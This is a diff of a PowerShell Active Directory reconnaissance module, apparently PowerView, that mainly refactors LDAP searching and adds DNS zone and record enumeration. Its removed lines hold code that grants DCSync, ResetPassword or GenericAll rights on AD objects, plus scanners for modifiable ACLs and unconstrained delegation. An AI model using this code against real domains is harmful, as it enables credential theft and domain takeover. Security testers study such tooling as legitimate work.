ForEach-Object { - - # adapted from https://social.technet.microsoft.com/Forums/windowsserver/en-US/df3bfd33-c070-4a9c-be98-c4da6e591a0a/forum-faq-using-powershell-to-assign-permissions-on-active-directory-objects - - $TargetDN = $_.Properties.distinguishedname - - $Identity = [System.Security.Principal.IdentityReference] ([System.Security.Principal.SecurityIdentifier]$ResolvedPrincipalSID) - $InheritanceType = [System.DirectoryServices.ActiveDirectorySecurityInheritance] "None" - $ControlType = [System.Security.AccessControl.AccessControlType] "Allow" - $ACEs = @() + } - if($RightsGUID) { - $GUIDs = @($RightsGUID) - } - else { - $GUIDs = Switch ($Rights) { - # ResetPassword doesn't need to know the user's current password - "ResetPassword" { "00299570-246d-11d0-a768-00aa006e0529" } - # allows for the modification of group membership - "WriteMembers" { "bf9679c0-0de6-11d0-a285-00aa003049e2" } - # 'DS-Replication-Get-Changes' = 1131f6aa-9c07-11d1-f79f-00c04fc2dcd2 - # 'DS-Replication-Get-Changes-All' = 1131f6ad-9c07-11d1-f79f-00c04fc2dcd2 - # 'DS-Replication-Get-Changes-In-Filtered-Set' = 89e95b76-444d-4c62-991a-0facbeda640c - # when applied to a domain's ACL, allows for the use of DCSync - "DCSync" { "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2", "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2", "89e95b76-444d-4c62-991a-0facbeda640c"} - } - } + if ($PSBoundParameters['SearchBasePrefix']) { + $SearchString += $SearchBasePrefix + ',' + } - if($GUIDs) { - foreach($GUID in $GUIDs) { - $NewGUID = New-Object Guid $GUID - $ADRights = [System.DirectoryServices.ActiveDirectoryRights] "ExtendedRight" - $ACEs += New-Object System.DirectoryServices.ActiveDirectoryAccessRule $Identity,$ADRights,$ControlType,$NewGUID,$InheritanceType - } + if ($PSBoundParameters['SearchBase']) { + if ($SearchBase -Match '^GC://') { + # if we're searching the global catalog, get the path in the right format + $DN = $SearchBase.ToUpper().Trim('/') + $SearchString = '' + } + else { + if ($SearchBase -match '^LDAP://') { + if ($SearchBase -match "LDAP://.+/.+") { + $SearchString = '' + $DN = $SearchBase } else { - # deault to GenericAll rights - $ADRights = [System.DirectoryServices.ActiveDirectoryRights] "GenericAll" - $ACEs += New-Object System.DirectoryServices.ActiveDirectoryAccessRule $Identity,$ADRights,$ControlType,$InheritanceType - } - - Write-Verbose "Granting principal $ResolvedPrincipalSID '$Rights' on $($_.Properties.distinguishedname)" - - try { - # add all the new ACEs to the specified object - ForEach ($ACE in $ACEs) { - Write-Verbose "Granting principal $ResolvedPrincipalSID '$($ACE.ObjectType)' rights on $($_.Properties.distinguishedname)" - $Object = [adsi]($_.path) - $Object.PsBase.ObjectSecurity.AddAccessRule($ACE) - $Object.PsBase.commitchanges() - } - } - catch { - Write-Warning "Error granting principal $ResolvedPrincipalSID '$Rights' on $TargetDN : $_" + $DN = $SearchBase.SubString(7) } } - $Results.dispose() - $Searcher.dispose() + else { + $DN = $SearchBase + } } - catch { - Write-Warning "Error: $_" + } + else { + # transform the target domain name into a distinguishedName if an ADS search base is not specified + if ($TargetDomain -and ($TargetDomain.Trim() -ne '')) { + $DN = "DC=$($TargetDomain.Replace('.', ',DC='))" } } - } -} + $SearchString += $DN + Write-Verbose "[Get-DomainSearcher] search base: $SearchString" -function Invoke-ACLScanner { -<# - .SYNOPSIS - Searches for ACLs for specifable AD objects (default to all domain objects) - with a domain sid of > -1000, and have modifiable rights. - - Thanks Sean Metcalf (@pyrotek3) for the idea and guidance. - - .PARAMETER SamAccountName + if ($Credential -ne [Management.Automation.PSCredential]::Empty) { + Write-Verbose "[Get-DomainSearcher] Using alternate credentials for LDAP connection" + # bind to the inital search object using alternate credentials + $DomainObject = New-Object DirectoryServices.DirectoryEntry($SearchString, $Credential.UserName, $Credential.GetNetworkCredential().Password) + $Searcher = New-Object System.DirectoryServices.DirectorySearcher($DomainObject) + } + else { + # bind to the inital object using the current credentials + $Searcher = New-Object System.DirectoryServices.DirectorySearcher([ADSI]$SearchString) + } - Object name to filter for. + $Searcher.PageSize = $ResultPageSize + $Searcher.SearchScope = $SearchScope + $Searcher.CacheResults = $False + $Searcher.ReferralChasing = [System.DirectoryServices.ReferralChasingOption]::All - .PARAMETER Name + if ($PSBoundParameters['ServerTimeLimit']) { + $Searcher.ServerTimeLimit = $ServerTimeLimit + } - Object name to filter for. + if ($PSBoundParameters['Tombstone']) { + $Searcher.Tombstone = $True + } - .PARAMETER DistinguishedName + if ($PSBoundParameters['LDAPFilter']) { + $Searcher.filter = $LDAPFilter + } - Object distinguished name to filter for. + if ($PSBoundParameters['SecurityMasks']) { + $Searcher.SecurityMasks = Switch ($SecurityMasks) { + 'Dacl' { [System.DirectoryServices.SecurityMasks]::Dacl } + 'Group' { [System.DirectoryServices.SecurityMasks]::Group } + 'None' { [System.DirectoryServices.SecurityMasks]::None } + 'Owner' { [System.DirectoryServices.SecurityMasks]::Owner } + 'Sacl' { [System.DirectoryServices.SecurityMasks]::Sacl } + } + } - .PARAMETER Filter + if ($PSBoundParameters['Properties']) { + # handle an array of properties to load w/ the possibility of comma-separated strings + $PropertiesToLoad = $Properties| ForEach-Object { $_.Split(',') } + $Null = $Searcher.PropertiesToLoad.AddRange(($PropertiesToLoad)) + } - A customized ldap filter string to use, e.g. "(description=*admin*)" - - .PARAMETER ADSpath + $Searcher + } +} - The LDAP source to search through, e.g. "LDAP://OU=secret,DC=testlab,DC=local" - Useful for OU queries. - .PARAMETER ADSprefix +function Convert-DNSRecord { +<# +.SYNOPSIS - Prefix to set for the searcher (like "CN=Sites,CN=Configuration") +Helpers that decodes a binary DNS record blob. - .PARAMETER Domain +Author: Michael B. Smith, Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: None - The domain to use for the query, defaults to the current domain. +.DESCRIPTION - .PARAMETER DomainController +Decodes a binary blob representing an Active Directory DNS entry. +Used by Get-DomainDNSRecord. - Domain controller to reflect LDAP queries through. +Adapted/ported from Michael B. Smith's code at https://raw.githubusercontent.com/mmessano/PowerShell/master/dns-dump.ps1 - .PARAMETER ResolveGUIDs +.PARAMETER DNSRecord - Switch. Resolve GUIDs to their display names. +A byte array representing the DNS record. - .PARAMETER PageSize +.OUTPUTS - The PageSize to set for the LDAP searcher object. +System.Management.Automation.PSCustomObject - .EXAMPLE +Outputs custom PSObjects with detailed information about the DNS record entry. - PS C:\> Invoke-ACLScanner -ResolveGUIDs | Export-CSV -NoTypeInformation acls.csv +.LINK - Enumerate all modifable ACLs in the current domain, resolving GUIDs to display - names, and export everything to a .csv +https://raw.githubusercontent.com/mmessano/PowerShell/master/dns-dump.ps1 #> + [OutputType('System.Management.Automation.PSCustomObject')] [CmdletBinding()] - Param ( - [Parameter(ValueFromPipeline=$True)] - [String] - $SamAccountName, - - [String] - $Name = "*", + Param( + [Parameter(Position = 0, Mandatory = $True, ValueFromPipelineByPropertyName = $True)] + [Byte[]] + $DNSRecord + ) - [Alias('DN')] - [String] - $DistinguishedName = "*", + BEGIN { + function Get-Name { + [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSUseOutputTypeCorrectly', '')] + [CmdletBinding()] + Param( + [Byte[]] + $Raw + ) - [String] - $Filter, + [Int]$Length = $Raw[0] + [Int]$Segments = $Raw[1] + [Int]$Index = 2 + [String]$Name = '' - [String] - $ADSpath, + while ($Segments-- -gt 0) + { + [Int]$SegmentLength = $Raw[$Index++] + while ($SegmentLength-- -gt 0) { + $Name += [Char]$Raw[$Index++] + } + $Name += "." + } + $Name + } + } - [String] - $ADSprefix, + PROCESS { + # $RDataLen = [BitConverter]::ToUInt16($DNSRecord, 0) + $RDataType = [BitConverter]::ToUInt16($DNSRecord, 2) + $UpdatedAtSerial = [BitConverter]::ToUInt32($DNSRecord, 8) - [String] - $Domain, + $TTLRaw = $DNSRecord[12..15] - [String] - $DomainController, + # reverse for big endian + $Null = [array]::Reverse($TTLRaw) + $TTL = [BitConverter]::ToUInt32($TTLRaw, 0) - [Switch] - $ResolveGUIDs, + $Age = [BitConverter]::ToUInt32($DNSRecord, 20) + if ($Age -ne 0) { + $TimeStamp = ((Get-Date -Year 1601 -Month 1 -Day 1 -Hour 0 -Minute 0 -Second 0).AddHours($age)).ToString() + } + else { + $TimeStamp = '[static]' + } - [ValidateRange(1,10000)] - [Int] - $PageSize = 200 - ) + $DNSRecordObject = New-Object PSObject - # Get all domain ACLs with the appropriate parameters - Get-ObjectACL @PSBoundParameters | ForEach-Object { - # add in the translated SID for the object identity - $_ | Add-Member Noteproperty 'IdentitySID' ($_.IdentityReference.Translate([System.Security.Principal.SecurityIdentifier]).Value) - $_ - } | Where-Object { - # check for any ACLs with SIDs > -1000 - try { - # TODO: change this to a regex for speedup? - [int]($_.IdentitySid.split("-")[-1]) -ge 1000 + if ($RDataType -eq 1) { + $IP = "{0}.{1}.{2}.{3}" -f $DNSRecord[24], $DNSRecord[25], $DNSRecord[26], $DNSRecord[27] + $Data = $IP + $DNSRecordObject | Add-Member Noteproperty 'RecordType' 'A' + } + + elseif ($RDataType -eq 2) { + $NSName = Get-Name $DNSRecord[24..$DNSRecord.length] + $Data = $NSName + $DNSRecordObject | Add-Member Noteproperty 'RecordType' 'NS' + } + + elseif ($RDataType -eq 5) { + $Alias = Get-Name $DNSRecord[24..$DNSRecord.length] + $Data = $Alias + $DNSRecordObject | Add-Member Noteproperty 'RecordType' 'CNAME' + } + + elseif ($RDataType -eq 6) { + # TODO: how to implement properly? nested object? + $Data = $([System.Convert]::ToBase64String($DNSRecord[24..$DNSRecord.length])) + $DNSRecordObject | Add-Member Noteproperty 'RecordType' 'SOA' + } + + elseif ($RDataType -eq 12) { + $Ptr = Get-Name $DNSRecord[24..$DNSRecord.length] + $Data = $Ptr + $DNSRecordObject | Add-Member Noteproperty 'RecordType' 'PTR' + } + + elseif ($RDataType -eq 13) { + # TODO: how to implement properly? nested object? + $Data = $([System.Convert]::ToBase64String($DNSRecord[24..$DNSRecord.length])) + $DNSRecordObject | Add-Member Noteproperty 'RecordType' 'HINFO' + } + + elseif ($RDataType -eq 15) { + # TODO: how to implement properly? nested object? + $Data = $([System.Convert]::ToBase64String($DNSRecord[24..$DNSRecord.length])) + $DNSRecordObject | Add-Member Noteproperty 'RecordType' 'MX' + } + + elseif ($RDataType -eq 16) { + [string]$TXT = '' + [int]$SegmentLength = $DNSRecord[24] + $Index = 25 + + while ($SegmentLength-- -gt 0) { + $TXT += [char]$DNSRecord[$index++] + } + + $Data = $TXT + $DNSRecordObject | Add-Member Noteproperty 'RecordType' 'TXT' + } + + elseif ($RDataType -eq 28) { + # TODO: how to implement properly? nested object? + $Data = $([System.Convert]::ToBase64String($DNSRecord[24..$DNSRecord.length])) + $DNSRecordObject | Add-Member Noteproperty 'RecordType' 'AAAA' + } + + elseif ($RDataType -eq 33) { + # TODO: how to implement properly? nested object? + $Data = $([System.Convert]::ToBase64String($DNSRecord[24..$DNSRecord.length])) + $DNSRecordObject | Add-Member Noteproperty 'RecordType' 'SRV' + } + + else { + $Data = $([System.Convert]::ToBase64String($DNSRecord[24..$DNSRecord.length])) + $DNSRecordObject | Add-Member Noteproperty 'RecordType' 'UNKNOWN' } - catch {} - } | Where-Object { - # filter for modifiable rights - ($_.ActiveDirectoryRights -eq "GenericAll") -or ($_.ActiveDirectoryRights -match "Write") -or ($_.ActiveDirectoryRights -match "Create") -or ($_.ActiveDirectoryRights -match "Delete") -or (($_.ActiveDirectoryRights -match "ExtendedRight") -and ($_.AccessControlType -eq "Allow")) + + $DNSRecordObject | Add-Member Noteproperty 'UpdatedAtSerial' $UpdatedAtSerial + $DNSRecordObject | Add-Member Noteproperty 'TTL' $TTL + $DNSRecordObject | Add-Member Noteproperty 'Age' $Age + $DNSRecordObject | Add-Member Noteproperty 'TimeStamp' $TimeStamp + $DNSRecordObject | Add-Member Noteproperty 'Data' $Data + $DNSRecordObject } } -filter Get-GUIDMap { +function Get-DomainDNSZone { <# - .SYNOPSIS +.SYNOPSIS - Helper to build a hash table of [GUID] -> resolved names +Enumerates the Active Directory DNS zones for a given domain. - Heavily adapted from http://blogs.technet.com/b/ashleymcglone/archive/2013/03/25/active-directory-ou-permissions-report-free-powershell-script-download.aspx +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: Get-DomainSearcher, Convert-LDAPProperty - .PARAMETER Domain - - The domain to use for the query, defaults to the current domain. +.PARAMETER Domain - .PARAMETER DomainController - - Domain controller to reflect LDAP queries through. +The domain to query for zones, defaults to the current domain. - .PARAMETER PageSize +.PARAMETER Server - The PageSize to set for the LDAP searcher object. +Specifies an Active Directory server (domain controller) to bind to for the search. - .LINK +.PARAMETER Properties - http://blogs.technet.com/b/ashleymcglone/archive/2013/03/25/active-directory-ou-permissions-report-free-powershell-script-download.aspx -#> +Specifies the properties of the output object to retrieve from the server. - [CmdletBinding()] - Param ( - [Parameter(ValueFromPipeline=$True)] - [String] - $Domain, +.PARAMETER ResultPageSize - [String] - $DomainController, +Specifies the PageSize to set for the LDAP searcher object. - [ValidateRange(1,10000)] - [Int] - $PageSize = 200 - ) +.PARAMETER ServerTimeLimit - $GUIDs = @{'00000000-0000-0000-0000-000000000000' = 'All'} +Specifies the maximum amount of time the server spends searching. Default of 120 seconds. - $SchemaPath = (Get-NetForest).schema.name +.PARAMETER FindOne - $SchemaSearcher = Get-DomainSearcher -ADSpath $SchemaPath -DomainController $DomainController -PageSize $PageSize - if($SchemaSearcher) { - $SchemaSearcher.filter = "(schemaIDGUID=*)" - try { - $Results = $SchemaSearcher.FindAll() - $Results | Where-Object {$_} | ForEach-Object { - # convert the GUID - $GUIDs[(New-Object Guid (,$_.properties.schemaidguid[0])).Guid] = $_.properties.name[0] - } - $Results.dispose() - $SchemaSearcher.dispose() - } - catch { - Write-Verbose "Error in building GUID map: $_" - } - } +Only return one result object. - $RightsSearcher = Get-DomainSearcher -ADSpath $SchemaPath.replace("Schema","Extended-Rights") -DomainController $DomainController -PageSize $PageSize -Credential $Credential - if ($RightsSearcher) { - $RightsSearcher.filter = "(objectClass=controlAccessRight)" - try { - $Results = $RightsSearcher.FindAll() - $Results | Where-Object {$_} | ForEach-Object { - # convert the GUID - $GUIDs[$_.properties.rightsguid[0].toString()] = $_.properties.name[0] - } - $Results.dispose() - $RightsSearcher.dispose() - } - catch { - Write-Verbose "Error in building GUID map: $_" - } - } +.PARAMETER Credential - $GUIDs -} +A [Management.Automation.PSCredential] object of alternate credentials +for connection to the target domain. +.EXAMPLE -function Get-NetComputer { -<# - .SYNOPSIS +Get-DomainDNSZone - This function utilizes adsisearcher to query the current AD context - for current computer objects. Based off of Carlos Perez's Audit.psm1 - script in Posh-SecMod (link below). +Retrieves the DNS zones for the current domain. - .PARAMETER ComputerName +.EXAMPLE - Return computers with a specific name, wildcards accepted. +Get-DomainDNSZone -Domain dev.testlab.local -Server primary.testlab.local - .PARAMETER SPN +Retrieves the DNS zones for the dev.testlab.local domain, binding to primary.testlab.local. - Return computers with a specific service principal name, wildcards accepted. +.OUTPUTS - .PARAMETER OperatingSystem +PowerView.DNSZone - Return computers with a specific operating system, wildcards accepted. +Outputs custom PSObjects with detailed information about the DNS zone. +#> - .PARAMETER ServicePack + [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')] + [OutputType('PowerView.DNSZone')] + [CmdletBinding()] + Param( + [Parameter(Position = 0, ValueFromPipeline = $True)] + [ValidateNotNullOrEmpty()] + [String] + $Domain, - Return computers with a specific service pack, wildcards accepted. + [ValidateNotNullOrEmpty()] + [Alias('DomainController')] + [String] + $Server, - .PARAMETER Filter + [ValidateNotNullOrEmpty()] + [String[]] + $Properties, - A customized ldap filter string to use, e.g. "(description=*admin*)" + [ValidateRange(1, 10000)] + [Int] + $ResultPageSize = 200, - .PARAMETER Printers + [ValidateRange(1, 10000)] + [Int] + $ServerTimeLimit, - Switch. Return only printers. + [Alias('ReturnOne')] + [Switch] + $FindOne, - .PARAMETER Ping + [Management.Automation.PSCredential] + [Management.Automation.CredentialAttribute()] + $Credential = [Management.Automation.PSCredential]::Empty + ) - Switch. Ping each host to ensure it's up before enumerating. + PROCESS { + $SearcherArguments = @{ + 'LDAPFilter' = '(objectClass=dnsZone)' + } + if ($PSBoundParameters['Domain']) { $SearcherArguments['Domain'] = $Domain } + if ($PSBoundParameters['Server']) { $SearcherArguments['Server'] = $Server } + if ($PSBoundParameters['Properties']) { $SearcherArguments['Properties'] = $Properties } + if ($PSBoundParameters['ResultPageSize']) { $SearcherArguments['ResultPageSize'] = $ResultPageSize } + if ($PSBoundParameters['ServerTimeLimit']) { $SearcherArguments['ServerTimeLimit'] = $ServerTimeLimit } + if ($PSBoundParameters['Credential']) { $SearcherArguments['Credential'] = $Credential } + $DNSSearcher1 = Get-DomainSearcher @SearcherArguments + + if ($DNSSearcher1) { + if ($PSBoundParameters['FindOne']) { $Results = $DNSSearcher1.FindOne() } + else { $Results = $DNSSearcher1.FindAll() } + $Results | Where-Object {$_} | ForEach-Object { + $Out = Convert-LDAPProperty -Properties $_.Properties + $Out | Add-Member NoteProperty 'ZoneName' $Out.name + $Out.PSObject.TypeNames.Insert(0, 'PowerView.DNSZone') + $Out + } - .PARAMETER FullData + if ($Results) { + try { $Results.dispose() } + catch { + Write-Verbose "[Get-DomainDFSShare] Error disposing of the Results object: $_" + } + } + $DNSSearcher1.dispose() + } - Switch. Return full computer objects instead of just system names (the default). + $SearcherArguments['SearchBasePrefix'] = 'CN=MicrosoftDNS,DC=DomainDnsZones' + $DNSSearcher2 = Get-DomainSearcher @SearcherArguments - .PARAMETER Domain + if ($DNSSearcher2) { + try { + if ($PSBoundParameters['FindOne']) { $Results = $DNSSearcher2.FindOne() } + else { $Results = $DNSSearcher2.FindAll() } + $Results | Where-Object {$_} | ForEach-Object { + $Out = Convert-LDAPProperty -Properties $_.Properties + $Out | Add-Member NoteProperty 'ZoneName' $Out.name + $Out.PSObject.TypeNames.Insert(0, 'PowerView.DNSZone') + $Out + } + if ($Results) { + try { $Results.dispose() } + catch { + Write-Verbose "[Get-DomainDNSZone] Error disposing of the Results object: $_" + } + } + } + catch { + Write-Verbose "[Get-DomainDNSZone] Error accessing 'CN=MicrosoftDNS,DC=DomainDnsZones'" + } + $DNSSearcher2.dispose() + } + } +} - The domain to query for computers, defaults to the current domain. - .PARAMETER DomainController +function Get-DomainDNSRecord { +<# +.SYNOPSIS - Domain controller to reflect LDAP queries through. +Enumerates the Active Directory DNS records for a given zone. - .PARAMETER ADSpath +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: Get-DomainSearcher, Convert-LDAPProperty, Convert-DNSRecord - The LDAP source to search through, e.g. "LDAP://OU=secret,DC=testlab,DC=local" - Useful for OU queries. - - .PARAMETER SiteName +.DESCRIPTION - The AD Site name to search for computers. +Given a specific Active Directory DNS zone name, query for all 'dnsNode' +LDAP entries using that zone as the search base. Return all DNS entry results +and use Convert-DNSRecord to try to convert the binary DNS record blobs. - .PARAMETER Unconstrained +.PARAMETER ZoneName - Switch. Return computer objects that have unconstrained delegation. +Specifies the zone to query for records (which can be enumearted with Get-DomainDNSZone). - .PARAMETER PageSize +.PARAMETER Domain - The PageSize to set for the LDAP searcher object. +The domain to query for zones, defaults to the current domain. - .PARAMETER Credential +.PARAMETER Server - A [Management.Automation.PSCredential] object of alternate credentials - for connection to the target domain. +Specifies an Active Directory server (domain controller) to bind to for the search. - .EXAMPLE +.PARAMETER Properties - PS C:\> Get-NetComputer - - Returns the current computers in current domain. +Specifies the properties of the output object to retrieve from the server. - .EXAMPLE +.PARAMETER ResultPageSize - PS C:\> Get-NetComputer -SPN mssql* - - Returns all MS SQL servers on the domain. +Specifies the PageSize to set for the LDAP searcher object. - .EXAMPLE +.PARAMETER ServerTimeLimit - PS C:\> Get-NetComputer -Domain testing - - Returns the current computers in 'testing' domain. +Specifies the maximum amount of time the server spends searching. Default of 120 seconds. - .EXAMPLE +.PARAMETER FindOne - PS C:\> Get-NetComputer -Domain testing -FullData - - Returns full computer objects in the 'testing' domain. +Only return one result object. - .LINK +.PARAMETER Credential - https://github.com/darkoperator/Posh-SecMod/blob/master/Audit/Audit.psm1 -#> +A [Management.Automation.PSCredential] object of alternate credentials +for connection to the target domain. - [CmdletBinding()] - Param ( - [Parameter(ValueFromPipeline=$True)] - [Alias('HostName')] - [String] - $ComputerName = '*', +.EXAMPLE - [String] - $SPN, +Get-DomainDNSRecord -ZoneName testlab.local - [String] - $OperatingSystem, +Retrieve all records for the testlab.local zone. - [String] - $ServicePack, +.EXAMPLE - [String] - $Filter, +Get-DomainDNSZone | Get-DomainDNSRecord - [Switch] - $Printers, +Retrieve all records for all zones in the current domain. - [Switch] - $Ping, +.EXAMPLE - [Switch] - $FullData, +Get-DomainDNSZone -Domain dev.testlab.local | Get-DomainDNSRecord -Domain dev.testlab.local - [String] - $Domain, +Retrieve all records for all zones in the dev.testlab.local domain. + +.OUTPUTS + +PowerView.DNSRecord + +Outputs custom PSObjects with detailed information about the DNS record entry. +#> + [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')] + [OutputType('PowerView.DNSRecord')] + [CmdletBinding()] + Param( + [Parameter(Position = 0, Mandatory = $True, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)] + [ValidateNotNullOrEmpty()] [String] - $DomainController, + $ZoneName, + [ValidateNotNullOrEmpty()] [String] - $ADSpath, + $Domain, + [ValidateNotNullOrEmpty()] + [Alias('DomainController')] [String] - $SiteName, + $Server, - [Switch] - $Unconstrained, + [ValidateNotNullOrEmpty()] + [String[]] + $Properties = 'name,distinguishedname,dnsrecord,whencreated,whenchanged', - [ValidateRange(1,10000)] + [ValidateRange(1, 10000)] [Int] - $PageSize = 200, - - [Management.Automation.PSCredential] - $Credential - ) + $ResultPageSize = 200, - begin { - # so this isn't repeated if multiple computer names are passed on the pipeline - $CompSearcher = Get-DomainSearcher -Domain $Domain -DomainController $DomainController -ADSpath $ADSpath -PageSize $PageSize -Credential $Credential - } + [ValidateRange(1, 10000)] + [Int] + $ServerTimeLimit, - process { + [Alias('ReturnOne')] + [Switch] + $FindOne, - if ($CompSearcher) { + [Management.Automation.PSCredential] + [Management.Automation.CredentialAttribute()] + $Credential = [Management.Automation.PSCredential]::Empty + ) - # if we're checking for unconstrained delegation - if($Unconstrained) { - Write-Verbose "Searching for computers with for unconstrained delegation" - $Filter += "(userAccountControl:1.2.840.113556.1.4.803:=524288)" - } - # set the filters for the seracher if it exists - if($Printers) { - Write-Verbose "Searching for printers" - # $CompSearcher.filter="(&(objectCategory=printQueue)$Filter)" - $Filter += "(objectCategory=printQueue)" - } - if($SPN) { - Write-Verbose "Searching for computers with SPN: $SPN" - $Filter += "(servicePrincipalName=$SPN)" - } - if($OperatingSystem) { - $Filter += "(operatingsystem=$OperatingSystem)" - } - if($ServicePack) { - $Filter += "(operatingsystemservicepack=$ServicePack)" - } - if($SiteName) { - $Filter += "(serverreferencebl=$SiteName)" - } + PROCESS { + $SearcherArguments = @{ + 'LDAPFilter' = '(objectClass=dnsNode)' + 'SearchBasePrefix' = "DC=$($ZoneName),CN=MicrosoftDNS,DC=DomainDnsZones" + } + if ($PSBoundParameters['Domain']) { $SearcherArguments['Domain'] = $Domain } + if ($PSBoundParameters['Server']) { $SearcherArguments['Server'] = $Server } + if ($PSBoundParameters['Properties']) { $SearcherArguments['Properties'] = $Properties } + if ($PSBoundParameters['ResultPageSize']) { $SearcherArguments['ResultPageSize'] = $ResultPageSize } + if ($PSBoundParameters['ServerTimeLimit']) { $SearcherArguments['ServerTimeLimit'] = $ServerTimeLimit } + if ($PSBoundParameters['Credential']) { $SearcherArguments['Credential'] = $Credential } + $DNSSearcher = Get-DomainSearcher @SearcherArguments + + if ($DNSSearcher) { + if ($PSBoundParameters['FindOne']) { $Results = $DNSSearcher.FindOne() } + else { $Results = $DNSSearcher.FindAll() } + $Results | Where-Object {$_} | ForEach-Object { + try { + $Out = Convert-LDAPProperty -Properties $_.Properties | Select-Object name,distinguishedname,dnsrecord,whencreated,whenchanged + $Out | Add-Member NoteProperty 'ZoneName' $ZoneName - $CompFilter = "(&(sAMAccountType=805306369)(dnshostname=$ComputerName)$Filter)" - Write-Verbose "Get-NetComputer filter : '$CompFilter'" - $CompSearcher.filter = $CompFilter + # convert the record and extract the properties + if ($Out.dnsrecord -is [System.DirectoryServices.ResultPropertyValueCollection]) { + # TODO: handle multiple nested records properly? + $Record = Convert-DNSRecord -DNSRecord $Out.dnsrecord[0] + } + else { + $Record = Convert-DNSRecord -DNSRecord $Out.dnsrecord + } - try { - $Results = $CompSearcher.FindAll() - $Results | Where-Object {$_} | ForEach-Object { - $Up = $True - if($Ping) { - # TODO: how can these results be piped to ping for a speedup? - $Up = Test-Connection -Count 1 -Quiet -ComputerName $_.properties.dnshostname - } - if($Up) { - # return full data objects - if ($FullData) { - # convert/process the LDAP fields for each result - $Computer = Convert-LDAPProperty -Properties $_.Properties - $Computer.PSObject.TypeNames.Add('PowerView.Computer') - $Computer - } - else { - # otherwise we're just returning the DNS host name - $_.properties.dnshostname + if ($Record) { + $Record.PSObject.Properties | ForEach-Object { + $Out | Add-Member NoteProperty $_.Name $_.Value } } + + $Out.PSObject.TypeNames.Insert(0, 'PowerView.DNSRecord') + $Out + } + catch { + Write-Warning "[Get-DomainDNSRecord] Error: $_" + $Out } - $Results.dispose() - $CompSearcher.dispose() } - catch { - Write-Warning "Error: $_" + + if ($Results) { + try { $Results.dispose() } + catch { + Write-Verbose "[Get-DomainDNSRecord] Error disposing of the Results object: $_" + } } + $DNSSearcher.dispose() } } } -function Get-ADObject { +function Get-Domain { <# - .SYNOPSIS +.SYNOPSIS - Takes a domain SID and returns the user, group, or computer object - associated with it. +Returns the domain object for the current (or specified) domain. - .PARAMETER SID +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: None - The SID of the domain object you're querying for. +.DESCRIPTION - .PARAMETER Name +Returns a System.DirectoryServices.ActiveDirectory.Domain object for the current +domain or the domain specified with -Domain X. - The Name of the domain object you're querying for. +.PARAMETER Domain - .PARAMETER SamAccountName +Specifies the domain name to query for, defaults to the current domain. - The SamAccountName of the domain object you're querying for. +.PARAMETER Credential - .PARAMETER Domain +A [Management.Automation.PSCredential] object of alternate credentials +for connection to the target domain. - The domain to query for objects, defaults to the current domain. +.EXAMPLE - .PARAMETER DomainController +Get-Domain -Domain testlab.local - Domain controller to reflect LDAP queries through. +.EXAMPLE - .PARAMETER ADSpath +$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force +$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword) +Get-Domain -Credential $Cred - The LDAP source to search through, e.g. "LDAP://OU=secret,DC=testlab,DC=local" - Useful for OU queries. +.OUTPUTS - .PARAMETER Filter +System.DirectoryServices.ActiveDirectory.Domain - Additional LDAP filter string for the query. +A complex .NET domain object. - .PARAMETER ReturnRaw +.LINK - Switch. Return the raw object instead of translating its properties. - Used by Set-ADObject to modify object properties. - - .PARAMETER PageSize - - The PageSize to set for the LDAP searcher object. - - .PARAMETER Credential - - A [Management.Automation.PSCredential] object of alternate credentials - for connection to the target domain. - - .EXAMPLE - - PS C:\> Get-ADObject -SID "S-1-5-21-2620891829-2411261497-1773853088-1110" - - Get the domain object associated with the specified SID. - - .EXAMPLE - - PS C:\> Get-ADObject -ADSpath "CN=AdminSDHolder,CN=System,DC=testlab,DC=local" - - Get the AdminSDHolder object for the testlab.local domain. +http://social.technet.microsoft.com/Forums/scriptcenter/en-US/0c5b3f83-e528-4d49-92a4-dee31f4b481c/finding-the-dn-of-the-the-domain-without-admodule-in-powershell?forum=ITCG #> + [OutputType([System.DirectoryServices.ActiveDirectory.Domain])] [CmdletBinding()] - Param ( - [Parameter(ValueFromPipeline=$True)] - [String] - $SID, - - [String] - $Name, - - [String] - $SamAccountName, - + Param( + [Parameter(Position = 0, ValueFromPipeline = $True)] + [ValidateNotNullOrEmpty()] [String] $Domain, - [String] - $DomainController, + [Management.Automation.PSCredential] + [Management.Automation.CredentialAttribute()] + $Credential = [Management.Automation.PSCredential]::Empty + ) - [String] - $ADSpath, + PROCESS { + if ($PSBoundParameters['Credential']) { - [String] - $Filter, + Write-Verbose '[Get-Domain] Using alternate credentials for Get-Domain' - [Switch] - $ReturnRaw, + if ($PSBoundParameters['Domain']) { + $TargetDomain = $Domain + } + else { + # if no domain is supplied, extract the logon domain from the PSCredential passed + $TargetDomain = $Credential.GetNetworkCredential().Domain + Write-Verbose "[Get-Domain] Extracted domain '$TargetDomain' from -Credential" + } - [ValidateRange(1,10000)] - [Int] - $PageSize = 200, + $DomainContext = New-Object System.DirectoryServices.ActiveDirectory.DirectoryContext('Domain', $TargetDomain, $Credential.UserName, $Credential.GetNetworkCredential().Password) - [Management.Automation.PSCredential] - $Credential - ) - process { - if($SID) { - # if a SID is passed, try to resolve it to a reachable domain name for the searcher try { - $Name = Convert-SidToName $SID - if($Name) { - $Canonical = Convert-ADName -ObjectName $Name -InputType NT4 -OutputType Canonical - if($Canonical) { - $Domain = $Canonical.split("/")[0] - } - else { - Write-Warning "Error resolving SID '$SID'" - return $Null - } - } + [System.DirectoryServices.ActiveDirectory.Domain]::GetDomain($DomainContext) } catch { - Write-Warning "Error resolving SID '$SID' : $_" - return $Null + Write-Verbose "[Get-Domain] The specified domain '$TargetDomain' does not exist, could not be contacted, there isn't an existing trust, or the specified credentials are invalid: $_" } } - - $ObjectSearcher = Get-DomainSearcher -Domain $Domain -DomainController $DomainController -Credential $Credential -ADSpath $ADSpath -PageSize $PageSize - - if($ObjectSearcher) { - if($SID) { - 